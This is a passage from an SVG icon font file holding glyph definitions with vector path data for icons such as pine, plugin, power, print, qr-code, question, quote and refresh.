0l-91-93c-7-8-13-22-13-32v-215h-175v184c4 3 8 6 11 10 11-12 26-20 44-20 29 0 54 22 57 51 4-3 10-5 15-5 15 0 27 12 27 27 0 10-5 18-13 23 3 6 5 13 5 21 0 26-22 47-48 47-10 0-19-3-27-9-11 39-47 69-89 69-16 0-31-5-45-12-8 7-17 10-28 10-27 0-48-21-48-47 0-15 7-28 18-37-7-4-12-12-12-21 0-7 2-12 6-17-16-7-26-23-26-42 0-26 21-47 47-47 11 0 21 4 29 10 10-13 26-21 44-21 1 0 2 0 4 0v-174h-132v438h598l0-438z" />
<glyph glyph-name="pine" horiz-adv-x="1000" unicode="&#xefbd;" d="M880 214l-189 188c-2 2-3 5-2 7 1 2 4 4 7 4h45c10 0 20 6 24 15 3 10 1 20-7 27l-157 147c-2 2-3 5-2 7 1 3 4 4 6 4h23c10 0 19 6 23 16 4 9 2 19-5 26l-128 125c-5 5-12 8-18 8s-13-3-18-8l-128-125c-7-7-9-17-5-27 4-9 13-15 23-15h23c2 0 5-1 6-4 1-2 0-5-2-7l-158-147c-7-7-9-17-5-27 3-9 13-15 23-15h45c3 0 6-2 7-4 1-3 0-5-2-7l-189-188c-7-7-9-17-5-27 4-9 13-15 23-15h255c14 0 24-11 24-24v-212c0-13 12-24 26-24h114c14 0 25 11 25 24v212c0 13 11 24 25 24h255c10 0 19 6 23 15 4 10 2 20-5 27z" />
<glyph glyph-name="pixels" horiz-adv-x="1000" unicode="&#xefbe;" d="M911 768h-77c-14 0-26-12-26-26v-77c0-15 12-27 26-27h77c15 0 27 12 27 27v77c0 14-12 26-27 26z m-76-318v101c0 15-12 26-27 26h-100c-15 0-27-11-27-26v-101c0-14 12-26 27-26h100c15 0 27 12 27 26z m-243-342h-101c-15 0-26-12-26-27v-101c0-14 11-26 26-26h101c14 0 26 12 26 26v101c0 15-12 27-26 27z m278 277h-101c-14 0-26-12-26-26v-101c0-15 12-26 26-26h101c14 0 26 11 26 26v101c0 14-12 26-26 26z m-241 0h-166c-15 0-27-12-27-26v-167c0-14 12-26 27-26h166c14 0 26 12 26 26v167c0 14-12 26-26 26z m-376 45h212c15 0 27 12 27 26v212c0 15-12 27-27 27h-212c-14 0-26-12-26-27v-212c0-14 12-26 26-26z m112-169h-276c-15 0-26-12-26-27v-276c0-15 11-26 26-26h276c15 0 27 11 27 26v276c0 15-12 27-27 27z m330 360v101c0 15-12 26-26 26h-101c-15 0-26-11-26-26v-101c0-14 11-26 26-26h101c14 0 26 12 26 26z" />
<glyph glyph-name="plugin" horiz-adv-x="1000" unicode="&#xefbf;" d="M802 492v13h-85v14c0 72 0 144 0 217 0 10-3 21-8 29-12 20-40 27-64 19-23-7-36-24-36-50 0-72 0-144 0-216v-12h-214v9c0 74 0 148 1 222 0 22-10 36-29 45-36 17-81-7-79-49 3-72 1-144 1-216v-12h-90v-273c0-36 9-70 28-101 36-61 92-96 160-114 6-1 9-4 11-11 5-20 11-39 15-58h-9c-7 0-11-6-10-13l4-10c1-7 9-13 16-13h173c7 0 14 6 16 13l3 10c2 7-2 13-9 13h-11c7 20 13 41 21 61 1 3 5 7 8 8 31 9 60 20 87 39 64 44 100 104 100 183-1 85 0 169 0 253z" />
<glyph glyph-name="plus-circle" horiz-adv-x="1000" unicode="&#xefc0;" d="M500 788c-242 0-437-196-437-438 0-242 195-438 437-438 242 0 438 196 438 438 0 242-196 438-438 438z m302-467c-1-9-2-19-5-30h-238v-238c-11-3-21-4-31-5-10-1-20-1-30-1-9 0-18 0-27 1-9 1-19 2-30 5v238h-238c-2 11-4 21-5 31-1 10-1 20-1 30 0 9 0 18 1 27 1 9 3 19 5 30h238v238c11 2 21 4 31 5 10 1 20 1 30 1 9 0 18 0 27-1 9-1 19-3 30-5v-238h238c3-11 4-21 5-31 1-10 1-20 1-30 0-9 0-18-1-27z" />
<glyph glyph-name="plus-square" horiz-adv-x="1000" unicode="&#xefc1;" d="M865 788h-730c-40 0-72-33-72-73v-730c0-40 32-73 72-73h730c40 0 73 33 73 73v730c0 40-33 73-73 73z m-63-467c-1-9-2-19-5-30h-238v-238c-11-3-21-4-31-5-10-1-20-1-30-1-9 0-18 0-27 1-9 1-19 2-30 5v238h-238c-2 11-4 21-5 31-1 10-1 20-1 30 0 9 0 18 1 27 1 9 3 19 5 30h238v238c11 2 21 4 31 5 10 1 20 1 30 1 9 0 18 0 27-1 9-1 19-3 30-5v-238h238c3-11 4-21 5-31 1-10 1-20 1-30 0-9 0-18-1-27z" />
<glyph glyph-name="plus" horiz-adv-x="1000" unicode="&#xefc2;" d="M935 390c-1 15-3 30-6 46h-343v343c-16 3-31 5-44 7-13 1-26 2-39 2-15 0-29-1-43-2-14-1-30-4-46-7v-343h-343c-3-16-6-31-7-44-1-13-2-25-2-38 0-16 1-30 2-44 1-14 4-29 7-45h343v-344c16-3 31-6 44-7 13-1 26-1 39-1 15 0 29 0 43 1 14 1 29 4 46 7v344h343c3 16 5 30 6 43 2 13 2 26 2 39 1 15 0 29-2 43z" />
<glyph glyph-name="polygonal" horiz-adv-x="1000" unicode="&#xefc3;" d="M245 288h145c-25 42-48 83-73 125-24-43-47-83-72-125z m510-1c-25 43-48 83-73 126-24-42-48-83-72-126h145z m-419 136c25-43 48-84 73-126 25 43 48 83 73 126h-146z m255-126l73 126h-145c24-43 48-84 72-126z m255-168c-24 42-47 83-72 126-26-44-49-84-73-126h145z m-692 0h145c-24 43-48 83-73 126-25-43-48-84-72-126z m419 452h-146c25-43 48-83 73-126 25 43 49 84 73 126z m-146-610h146c-25 42-48 82-73 126-25-43-49-84-73-126z m-364 0h145c-25 43-48 83-73 126-25-43-48-83-72-126z m547 0h145c-25 43-48 83-73 126-25-43-48-84-72-126z m255 126c-25-43-49-84-73-126h146c-25 43-49 84-73 126z m-365 632c-25-43-48-83-73-125h145c-24 42-47 82-72 125z m-273-748c24 43 48 83 72 125h-145c25-42 48-82 73-125z m292 125c24-42 47-82 72-125 25 43 48 83 73 125h-145z m182 0c25-42 48-83 73-125 25 43 48 83 72 125h-145z m-37 339c-25 43-48 83-73 126-25-43-48-84-72-126h145z m-255 126c-25-43-48-83-73-125h145c-24 42-48 82-72 125z m-91-432c25 43 48 83 72 125h-145c25-42 48-82 73-125z m364 0c25 43 48 83 73 125h-145c25-43 48-83 72-125z" />
<glyph glyph-name="power" horiz-adv-x="1000" unicode="&#xefc4;" d="M857 518c-23 41-51 77-87 108-10 9-25 7-33-3-14-18-28-36-41-54-8-11-6-26 3-35 125-118 117-306 11-415-110-113-292-120-405-14-62 57-96 129-97 213 0 86 32 157 93 215 10 10 12 25 3 36-13 18-27 36-40 53-9 11-24 13-34 4-122-107-173-281-114-443 62-172 240-295 441-266 176 24 327 167 349 358 10 86-7 167-49 243z m-390-138h66c14 0 25 11 25 25v358c0 14-11 25-25 25h-66c-13 0-24-11-24-25v-358c0-14 11-25 24-25z" />
<glyph glyph-name="price" horiz-adv-x="1000" unicode="&#xefc5;" d="M697 779c-7 7-17 10-26 8l-148-38c-5-1-9-4-13-7l-439-440c-11-11-11-28 0-39l332-332c6-6 14-14 19-16 4-2 7-3 11-3 7 0 14 3 19 9l440 439c3 4 6 8 7 13l38 148c2 9-1 19-8 26l-232 232z m-409-537c-7 0-14 2-20 8-11 10-11 28 0 39l195 194c11 11 28 11 39 0 11-10 11-28 0-39l-195-194c-5-6-12-8-19-8z m65-66c-7 0-14 3-19 8-11 11-11 28 0 39l195 195c10 10 28 10 39 0 10-11 10-29 0-39l-195-195c-5-5-13-8-20-8z m280 137l-194-195c-6-5-13-8-20-8-7 0-14 3-19 8-11 11-11 28 0 39l194 195c11 11 29 11 39 0s11-28 0-39z m121 163c-17-17-40-27-64-27-24 0-47 10-64 27-36 35-36 93 0 128 17 17 40 27 64 27 24 0 47-10 64-27 35-35 35-93 0-128z" />
<glyph glyph-name="print" horiz-adv-x="1000" unicode="&#xefc6;" d="M732 618c0 27-10 53-30 72l-67 67c-19 20-45 31-73 31h-241c-29 0-53-25-53-54v-172h464v56z m-614-565h92v186h580v-186h92c30 0 54 24 54 54v339c0 29-24 53-54 53h-764c-29 0-53-24-53-53v-339c0-30 24-54 53-54z m85 373c31 0 56-25 56-56 0-31-25-57-56-57s-56 26-56 57 25 56 56 56z m533-487v247h-472v-247c0-14 12-27 27-27h418c15 0 27 12 27 27z m-352 137h232c14 0 25-10 27-23 0-1 0-3 0-4 0-15-12-27-27-27h-232c-15 0-27 12-27 27 0 1 0 3 0 4 2 13 13 23 27 23z" />
<glyph glyph-name="puzzle" horiz-adv-x="1000" unicode="&#xefc7;" d="M788 496c-2 1-3 3-5 5-2 3 3 8 12 11 7 3 15 5 22 8 48 18 72 60 67 113-4 42-43 83-86 89-51 7-94-17-114-62-4-8-7-17-11-25-3-9-8-15-9-14-2 1-3 2-4 3-52 52-104 103-156 155-1 1-2 3-2 4-2 3-5 5-6 5-2 0-6-4-9-8-2-2-4-5-6-7-52-51-103-103-155-154-4-5-9-10-13-16-14-17-11-34 9-45 14-7 30-11 44-19 28-15 37-48 22-75-15-27-51-37-77-20-11 8-18 22-25 34-6 10-8 23-13 33-10 19-25 22-43 10-6-5-12-11-17-16-49-49-97-97-144-144-6-6-6-17 0-24l417-416c6-7 14-10 17-8 1 2 3 3 5 5l137 137c3 3 6 7 9 10 21 24 17 44-13 57-13 5-26 10-39 15-31 13-49 44-44 75 5 32 30 56 60 60 36 3 63-13 75-46l13-36c13-34 34-38 61-12 35 33 68 68 102 101 18 18 36 35 55 52 6 7 12 14 12 16 0 1-2 4-5 6-2 1-3 2-4 4-47 46-93 93-139 139z" />
<glyph glyph-name="qr-code" horiz-adv-x="1000" unicode="&#xefc8;" d="M437 245c0 0 0 0 1 0s0 0 0 0c-1 0-1 0-1 0z m42-167c0 0 0-1 0-1s1 1 0 1c0 0 0 0 0 0z m-83 167c0 0 0 0 0 0s0 0 0 0c0 0 0 0 0 0z m251 84c0 0 0 0 0 0s0 0 0 0-1 0-1 0 0 0 1 0z m-48 41h-70c-3 0-6-2-6-5v-115c0-3 3-5 6-5h69c3 0 5-3 5-6v-29c0-3-2-5-5-5h-156c-3 0-5 2-5 5v30c0 3-2 5-5 5h-30c-3 0-6-2-6-5v-114c0-2 3-5 6-5h29c3 0 6 3 6 5l1 29c0 3 3 5 6 5h155c3 0 5-2 5-5 1-10 2-20 2-29 0-3 3-5 6-5 10-1 19-1 28-2 3 0 5-3 5-5v-32c0-3-2-5-5-5h-29c-3 0-5-3-5-5-1-11-1-20-2-29 0-3-2-5-5-5h-115c-3 0-5 2-5 5v29c0 3-2 6-5 6h-31c-3 0-5-3-5-6v-72c0-3 2-5 5-5h32c3 0 5-2 5-5v-32c0-3 2-5 5-5l31-1c3 0 5-2 5-5v-29c0-3 2-5 5-5h240c3 0 6 2 6 5v29c0 3-3 5-6 5h-31c-3 0-5 3-5 6v31c0 3-2 5-5 5h-30c-3 0-5-2-5-5l-2-30c0-3-3-5-6-5h-29c-3 0-5 2-5 5v72c0 3 2 5 5 5h29c3 0 6 2 6 5v32c0 3 2 6 5 6h32c3 0 5 2 5 5v73c0 3-2 5-5 5h-31c-3 0-6 2-6 5v72c0 3-2 5-5 5-11 1-21 2-31 2-3 1-6 3-6 6v71c0 3-2 6-5 6l-31 1c-3 0-6 2-6 5l1 30c-1 3-3 5-6 5z m-43-417h-29c-3 0-5 2-5 5v29c0 3 2 5 5 5h29c3 0 5-2 5-5v-29c0-3-2-5-5-5z m9 340v31c0 3 2 5 5 5h28c3 0 5-2 5-5v-31c0-2-2-5-5-5h-28c-3 0-5 3-5 5z m373-83v112c0 3-2 6-5 6l-31 2c-3 0-5 3-5 5v73c0 3-3 5-6 5h-71c-3 0-5 2-6 5 0 10 0 20-1 29 0 3-3 5-5 5h-71c-3 0-5-2-5-5v-28c0-3 2-5 5-6 10 0 19-1 28-1 3 0 5-3 5-6v-72c0-3-2-5-5-5h-71c-3 0-5-3-5-6v-32c0-3 2-5 5-5h197c3 0 5-2 5-5v-31c0-3-2-5-5-5h-153c-3 0-6-2-6-5v-32c0-3 3-5 6-5h28c3 0 5-2 5-5 1-11 2-21 2-31 1-3 3-5 6-5h29c3 0 5-3 5-6v-32c0-3 3-5 6-5h32c3 0 6-2 6-5v-29c0-3 2-5 5-5h70c3 0 5 2 5 5v29c0 3-2 5-5 5-10 1-19 1-28 2-3 0-5 2-5 5v71c0 3 2 6 5 6 10 1 20 1 29 2 3 0 5 2 5 5z m-89 121h-28c-3 0-5 2-5 5v28c0 3 2 5 5 5h28c3 0 6-2 6-5v-28c0-3-3-5-6-5z m0-169h-30c-2 0-5 2-5 5v29c0 3 3 6 5 6h30c3 0 5-3 5-6v-29c0-3-2-5-5-5z m-160 166c0 0 0 1 0 1s0 0 0 0c-1 0-1-1 0-1z m-621-415h279c3 0 5 2 5 5v279c0 3-2 5-5 5h-279c-2 0-5-2-5-5v-279c0-3 3-5 5-5z m42 248h196c3 0 5-3 5-6v-195c0-3-2-5-5-5h-196c-3 0-5 2-5 5v195c0 3 2 6 5 6z m237 626h-279c-3 0-5-2-5-5v-279c0-3 2-5 5-5h279c3 0 5 2 5 5v279c0 3-3 5-5 5z m-41-247h-196c-3 0-5 2-5 5v196c0 3 2 5 5 5h196c3 0 5-2 5-5v-196c0-3-2-5-5-5z m627 248h-279c-3 0-5-3-5-6v-278c0-3 2-6 5-6h279c3 0 5 3 5 6v278c0 3-2 6-5 6z m-42-250h-195c-3 0-5 3-5 6v196c0 3 2 5 5 5h195c3 0 5-2 5-5v-196c0-3-2-6-5-6z m-746-209c0 0 0 0 0 0s0 0 0 0c0 0 0 0 0 0z m0 41c0 0 0 0 0 1s0 0 0 0 0-1 0-1z m293-35v29c0 3 3 6 6 6 10 1 19 1 28 2 3 0 5 3 5 5v31c0 3-2 5-5 5h-71c-2 0-5 2-5 5v29c0 3-2 5-5 5h-116c-3 0-5-2-5-5v-29c0-3-3-6-6-6h-71c-3 0-5-2-5-5-1-11-2-21-2-31 0-3-3-6-6-6h-29c-3 0-6-2-6-5v-30c0-3 3-5 6-5h71c3 0 6 2 6 5l1 29c1 3 3 5 6 5h32c3 0 5-2 5-5v-72c0-3 2-5 5-5l30 2c3 0 6 2 6 5v31c0 2 2 5 5 5h115c3 0 5 2 5 5z m-119 77h71c3 0 5-2 5-5v-29c0-3-2-6-5-6h-71c-3 0-5 3-5 6v29c0 3 2 5 5 5z m251 252h28c3 0 5 2 5 5v113c0 3-2 5-5 5h-72c-3 0-5-2-5-5v-29c0-3-2-6-5-6h-31c-3 0-5-2-5-5v-115c0-3 2-5 5-5h72c3 0 5 2 5 5 1 12 1 21 2 32 0 3 3 5 6 5z m-14 43h-29c-3 0-5 2-5 5v29c0 3 2 6 5 6h29c3 0 5-3 5-6v-29c0-3-2-5-5-5z m-77-85c0 0 0 0 0 0s1 0 1 0 0 0-1 0z m376-628c0 0 0 0 1 0s0 0 0 0-1 0-1 0z m1-41c-1 0-1 0-1 0s0-1 1 0 0 0 0 0z m-84 0c0 0 0 0 0-1s0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0z m-41 41c0 0-1 0-1 0s0 0 0 0 0 1 0 1 1 0 1-1z m0 84c0 0-1 0-1 0s0 0 0 0 0 0 0 0 1 0 1 0z m41-89v-31c0-3 3-5 6-5l72 0c3 0 5 2 5 5v31c0 2-2 5-5 5h-32c-3 0-5 2-5 5v73c0 3-2 6-5 6h-72c-3 0-5-3-5-6v-72c0-3 2-5 5-5h31c3 0 5-3 5-6z m-334 549c0 0 0 0 0 0s-1 0 0 0c0 0 0 0 0 0z m5 1l32 0c2 0 5 3 5 6l-1 71c0 3-2 5-5 5h-30c-3 0-6 3-6 5l-1 31c-1 3-3 5-6 5h-28c-3 0-6-2-6-5v-71c0-3 3-5 6-5 10-1 20-2 30-2 3 0 5-3 5-6v-29c0-3 2-5 5-5z m36 83c0 0 0-1 1-1s0 1 0 1c-1 0-1 0-1 0z m-41-628c0 1 0 1 0 1s-1 0-1-1c1 0 0 0 0 0s0 0 1 0c0 0 0 0 0 0z m-6 0h-29c-3 0-5-2-5-5v-71c0-3 2-5 5-5h71c3 0 5 2 5 5v29c0 3-2 5-5 5h-32c-3 0-5 2-5 5v32c0 3-2 5-5 5z m48-41c0-1 0-1-1-1s0 0 0 1 0 0 0 0 1 0 1 0z m-335 376c0 0 0 0 0 0s0 0 0 0c0 0 0 0 0 0z m-76-82h28c3 0 5 2 5 5 1 10 1 20 2 30 0 3 3 6 6 6h29c3 0 5 2 5 5l1 30c0 3-3 6-6 6h-70c-3 0-6-3-6-6v-71c0-3 3-5 6-5z m76 41c0 0-1-1-1-1s1 0 1 0c0 0 0 1 0 1z m544 41c0 0 0 0 0 0s-1 0-1 0 0 0 1 0z m-84 42c0 0 0 0 0 0s0-1 0-1-1 0-1 1 1 0 1 0z m0 34v-29c0-3 3-5 5-5h32c3 0 5-2 5-5v-31c0-3 2-6 5-6h31c3 0 5 3 5 6v71c0 2-2 5-5 5h-73c-2 0-5-3-5-6z m-542 42v-28c0-3 2-5 5-6 10 0 19-1 29-1 3-1 5-3 5-6l2-30c0-3 3-5 6-5h29c3 0 6 2 6 5v71c0 3-3 5-6 5h-71c-3 0-5-2-5-5z m82-76c0 0 0 0 0 0s0 0 0 0 0-1 0 0z m424 126h29c3 0 5 2 5 5v71c0 3-2 5-5 5h-71c-3 0-5-2-5-5v-29c0-3 2-6 5-6h31c3 0 5-2 5-5v-31c0-3 3-5 6-5z m-343-245v30c0 2-2 5-5 5h-71c-2 0-5-3-5-5v-30c0-3 3-5 5-5h71c3 0 5 2 5 5z m-81 35c0 0 0 0 0 0s0 0 0 0 0 0 0 0z m168 1c0 0 0 1 0 1 0 0 0-1 0-1s0 0 0 0 0 0 0 0 0 0 0 0z m0-6v-31c0-3 3-5 6-5h71c3 0 6 2 6 5v31c0 3-3 6-6 6h-71c-3 0-6-3-6-6z m83-37c0 0 0 1 0 1s0-1 0-1 0 0 0 0z m460-251c0 0 0 0 0 0s0 1 0 1-1-1 0-1z m76 40h-71c-3 0-5-2-5-5v-29c0-3 2-5 5-5h71c3 0 5 2 5 5v29c1 3-2 5-5 5z m-369 462c0 0 0 0 0 0s0 0 0 0 0 1 0 1c0 0 0-1 0-1z m-36-81h30c3 0 6 2 6 5v71c0 2-3 5-6 5h-30c-3 0-5-3-5-5v-71c0-3 2-5 5-5z m29-297h-71c-3 0-5-2-5-5v-29c0-3 2-6 5-6h71c3 0 5 3 5 6v29c0 3-2 5-5 5z m-77-40c1 0 1 0 1 0s0 0-1 0 0 0 0 0z m377-125c-1-1-1-1 0-1s0 0 0 1 0 0 0 0z m40-35v29c0 3-3 5-6 5h-29c-3 0-5-2-5-5v-29c0-3 2-6 5-6h29c3 0 6 3 6 6z m-424 367h-29c-3 0-5-2-5-5v-29c0-3 2-5 5-5h29c3 0 6 2 6 5v29c0 3-3 5-6 5z m-34-40c0 0 0 0 0 0s0 1 0 1-1-1 0-1z m83 293c1 0 1 0 1 0s-1 0-1 0 0 0 0 0 0 0 0 0 1 0 0 0z m-40 1c0 0-1 0-1 0 0 0 0 0 0 0s0 0 0 0 0 0 0 0c0 0 1 0 1 0z m41-43c0 0-1 0-1 0s0 0 0 0 0 1 0 1 1-1 1-1z m-1 6v30c0 3-2 6-5 6l-30 0c-3 1-5-2-5-5v-31c0-3 2-5 5-5h30c3 0 5 2 5 5z m-118-4h29c3 0 5 2 5 5v29c0 3-2 6-5 6h-29c-3 0-5-3-5-6v-29c0-3 2-5 5-5z m35 40c-1 0-1 0-1 0s0 0 1 0 0 0 0 0z m-286-542h112c3 0 5 3 5 6v111c0 3-2 5-5 5h-112c-3 0-5-2-5-5v-111c0-3 2-6 5-6z m111 708h-111c-3 0-6-2-6-5v-112c0-3 3-5 6-5h111c3 0 5 2 5 5v112c0 3-2 5-5 5z m586-1h-112c-3 0-5-2-5-5v-112c0-2 2-5 5-5h112c3 0 5 3 5 5v112c0 3-2 5-5 5z" />
<glyph glyph-name="queen" horiz-adv-x="1000" unicode="&#xefc9;" d="M880 518c-32 0-58-26-58-57 0-13 5-24 11-34l-108-69-29 62c-4 9-14 13-23 9l-72-33c-2-2-4-4-6-6l-74 112c21 9 36 29 36 54 0 31-25 57-57 57-32 0-58-26-58-57 0-25 16-45 37-54l-74-112c-2 2-4 4-6 6l-72 33c-9 3-19 0-23-9l-29-63-108 70c6 10 10 21 10 34 0 31-25 57-57 57-32 0-58-26-58-57 0-32 26-58 58-58 6 0 12 1 17 3l140-223c4-5 9-8 15-8h416c6 0 11 3 14 8l141 223c5-2 11-3 17-3 32 0 57 26 57 58 1 31-25 57-57 57z m-171-380h-418c-10 0-18-11-18-25 0-14 8-26 18-26h418c10 0 18 12 18 26 0 14-8 25-18 25z" />
<glyph glyph-name="question-circle" horiz-adv-x="1000" unicode="&#xefca;" d="M500 788c-242 0-437-196-437-438 0-242 195-438 437-438 242 0 438 196 438 438 0 242-196 438-438 438z m50-742c-21-3-42-5-62-5-21 0-42 2-63 5-3 21-5 42-5 63s2 41 5 63c21 3 42 5 62 5 21 0 42-2 63-5 4-22 5-43 5-63 0-21-1-42-5-63z m114 370c-10-20-23-36-38-49-14-14-29-24-44-32-15-9-28-15-37-19v-77c-20-3-39-5-58-5s-36 2-53 5v146c13 2 26 6 41 10 14 4 27 10 39 18 12 7 22 16 29 27 8 11 12 25 12 42 0 24-9 42-27 55-17 13-41 19-70 19-12 0-22 0-32-1-9-1-18-2-26-4-7-2-16-4-24-7-8-3-17-5-26-9-8 15-14 30-20 46-5 16-8 33-9 50 15 5 29 9 41 13 12 4 25 6 37 9 11 2 23 4 35 4 12 1 25 2 38 2 69 0 120-16 155-47 34-31 52-73 52-127 0-27-5-50-15-69z" />
<glyph glyph-name="question-square" horiz-adv-x="1000" unicode="&#xefcb;" d="M865 788h-730c-40 0-72-33-72-73v-730c0-40 32-73 72-73h730c40 0 73 33 73 73v730c0 40-33 73-73 73z m-315-741c-22-4-42-6-62-6-21 0-42 2-63 6-3 21-5 41-5 62s2 41 5 63c21 3 42 5 62 5 21 0 41-2 63-5 4-22 5-43 5-62 0-21-1-42-5-63z m113 369c-10-19-22-35-37-49-14-13-29-24-45-32-15-8-27-14-37-18v-78c-20-3-39-5-57-5s-37 2-54 5v147c13 2 27 5 41 9 14 5 28 10 40 18 11 7 21 17 29 27 7 12 11 25 11 42 0 24-9 43-26 55-18 13-41 20-70 20-12 0-22-1-32-2-9 0-18-2-26-4-8-2-16-4-24-7-8-2-17-5-26-9-8 15-15 31-20 46-5 16-8 33-9 50 15 5 28 9 41 13 12 4 24 7 36 9 12 2 24 4 36 5 12 0 25 1 38 1 68 0 120-16 155-47 34-31 52-73 52-127 0-27-6-49-16-69z" />
<glyph glyph-name="question" horiz-adv-x="1000" unicode="&#xefcc;" d="M406 400c19 3 38 8 58 14 20 6 39 14 55 25s31 23 42 39c11 16 16 35 16 59 0 34-12 60-37 79s-58 27-99 27c-17 0-32-1-45-2-14-1-26-3-37-6-11-3-23-6-35-10-11-3-24-8-36-12-12 21-21 42-28 65-7 22-12 46-13 70 21 7 40 13 58 19 17 5 35 9 51 12 18 3 34 6 51 7 17 1 35 2 55 2 96 0 169-22 218-66 49-44 74-104 74-181 0-37-8-70-22-97-14-28-32-51-53-70-20-19-41-34-63-46-22-11-39-20-53-26v-109c-28-5-55-8-81-8-26 0-52 3-76 8l0 207z m-12-480c-5 30-7 59-7 88s2 59 7 89c30 5 59 8 88 8 29 0 59-3 89-8 5-30 8-60 8-88 0-30-3-59-8-89-30-5-59-8-88-8-29 0-59 3-89 8z" />
<glyph glyph-name="quote-left" horiz-adv-x="1000" unicode="&#xefcd;" d="M398-18h-267c-38 0-68 31-68 69v242c0 115 23 205 71 272 39 53 100 102 183 146 34 17 77 2 94-31l24-44c17-34 4-74-29-93-39-23-68-45-87-68-14-17-25-35-32-55-13-33 17-62 55-62h56c38 0 69-31 69-69v-238c0-38-31-69-69-69z m471 0h-267c-38 0-69 31-69 69v242c0 115 24 205 72 272 39 53 100 102 183 146 34 17 77 2 94-31l23-44c18-34 4-74-28-93-40-23-68-45-87-68-14-17-25-35-32-55-13-33 17-62 55-62h56c38 0 69-31 69-69v-238c0-38-31-69-69-69z" />
<glyph glyph-name="quote-right" horiz-adv-x="1000" unicode="&#xefce;" d="M602 718h267c38 0 69-31 69-69v-242c0-115-24-205-72-271-39-54-100-103-183-147-34-17-77-2-94 32l-23 44c-18 33-4 73 28 92 40 23 68 45 87 68 14 17 25 35 32 55 13 33-17 63-55 63h-56c-38 0-69 30-69 68v238c0 38 31 69 69 69z m-471 0h267c38 0 69-31 69-69v-242c0-115-24-205-72-271-39-54-100-103-183-147-34-17-76-2-94 32l-23 44c-18 33-4 73 28 92 40 23 69 45 87 68 14 17 25 35 32 55 13 33-17 63-55 63h-56c-38 0-68 30-68 68v238c0 38 30 69 68 69z" />
<glyph glyph-name="random" horiz-adv-x="1000" unicode="&#xefcf;" d="M464 326c15 35 28 63 38 83 8 15 15 28 22 38 7 10 15 20 25 30 10 10 21 17 34 22 12 5 26 7 42 7h125v-93c0-5 2-8 5-11 3-3 7-5 11-5 4 0 8 1 11 4l156 157c3 3 5 6 5 11 0 4-2 8-5 11l-156 156c-4 3-7 5-11 5-5 0-9-2-12-5-2-3-4-6-4-11v-94h-125c-22 0-43-2-62-8-20-5-37-12-52-20-16-8-30-20-44-34s-27-27-37-40c-9-13-20-29-31-49-11-19-20-36-26-51-7-15-15-33-24-54-15-36-28-64-39-84-7-15-15-27-21-38-7-10-16-20-25-30-10-9-21-17-34-22-13-5-27-7-43-7h-109c-4 0-8-1-11-4-3-3-4-7-4-12v-93c0-5 1-9 4-12 3-2 7-4 11-4h110c22 0 43 3 62 8 20 5 37 12 52 21 15 8 30 19 44 33s26 28 36 41c10 13 20 29 31 48 11 20 20 37 27 52 6 14 15 32 24 54z m-386 180h110c14 0 27-2 39-7 13-4 23-10 31-17 8-7 17-16 25-27 8-12 15-23 20-31 5-9 11-21 18-36 25 59 47 104 67 133-52 74-119 110-200 110h-110c-4 0-8-1-11-4-3-3-4-7-4-11v-94c0-5 1-8 4-11 3-3 7-5 11-5z m699-208c-4 4-7 5-11 5-5 0-9-1-12-4-2-3-4-7-4-11v-94h-125c-14 0-28 2-40 7-12 5-22 10-31 17-8 7-16 16-24 28-9 11-15 22-20 31s-11 20-18 35c-25-59-48-103-67-133 9-13 18-24 28-34 9-10 18-19 26-26s19-14 29-20c11-5 20-10 29-14 8-3 18-7 30-9 13-2 23-4 32-5 8-1 20-2 34-2 15-1 27-1 36-1 9 0 22 0 39 1 18 0 32 0 42 0v-94c0-4 2-8 5-11 3-3 6-5 11-5 4 0 8 2 11 5l156 156c3 3 4 7 4 11s-1 9-4 12l-156 155z" />
<glyph glyph-name="recycle" horiz-adv-x="1000" unicode="&#xefd0;" d="M75 491l39-31c4-3 6-10 3-15l-47-90c-26-45 19-90 47-105 26-14 64-17 101-17 6 0 12 4 15 9l63 102c2 4 8 6 13 3l38-20c5-3 6-1 4 4l-86 159c-3 5-9 8-14 8l-174-1c-6 0-7-3-2-6z m5-245l108-200c3-5 7-12 11-16 25-24 66-30 108-29h114c6 0 10 5 10 10v187c0 5-4 9-10 9l-225 2c-34-2-79 4-114 39-4 4-5 3-2-2z m726 406l-46-20c-5-2-11 0-14 4l-56 85c-28 45-88 28-115 10-25-15-46-48-64-80-2-5-2-13 0-17l59-104c3-5 1-11-3-14l-36-23c-5-3-4-5 1-5l181-2c5-1 12 3 14 8l83 153c3 5 1 7-4 5z m-216 114l-228 2c-5 0-14-1-19-2-33-10-58-43-77-81l-56-100c-3-4-1-10 4-13l163-90c5-3 11-1 13 4l111 196c15 31 42 67 89 81 5 2 5 3 0 3z m21-829l6 50c0 5 5 9 10 10l102 8c52 2 66 63 64 95-1 29-20 63-39 95-3 5-10 8-15 8l-120-1c-5 0-10 4-10 10l-3 42c0 6-3 6-5 2l-90-158c-2-4-2-12 1-16l93-147c3-4 6-4 6 2z m205 133l112 199c3 4 7 12 8 17 7 34-10 72-33 107l-60 97c-3 5-9 6-14 3l-158-99c-4-2-6-8-3-13l118-192c20-28 38-69 28-117-2-6-1-6 2-2z" />
<glyph glyph-name="refresh" horiz-adv-x="1000" unicode="&#xefd1;" d="M900 295h-42c-19 0-37-15-42-33-38-138-165-240-316-240-103 0-195 47-255 122-12 14-9 38 5 50l85 78c14 13 10 23-9 23h-229c-19 0-34-15-34-34v-205c0-19 11-24 25-11l30 28c14 13 34 11 46-4 81-96 201-157 336-157 211 0 388 151 428 350 4 18-9 33-28 33z m13 359l-30-30c-13-13-32-11-44 3-81 98-203 161-339 161-211 0-388-150-428-350-4-18 9-33 28-33h42c19 0 37 15 42 33 38 139 165 240 316 240 106 0 201-50 261-129 12-15 8-39-5-52l-68-68c-13-14-9-24 10-24h205c19 0 35 15 35 34v205c0 19-11 23-25 10z" />
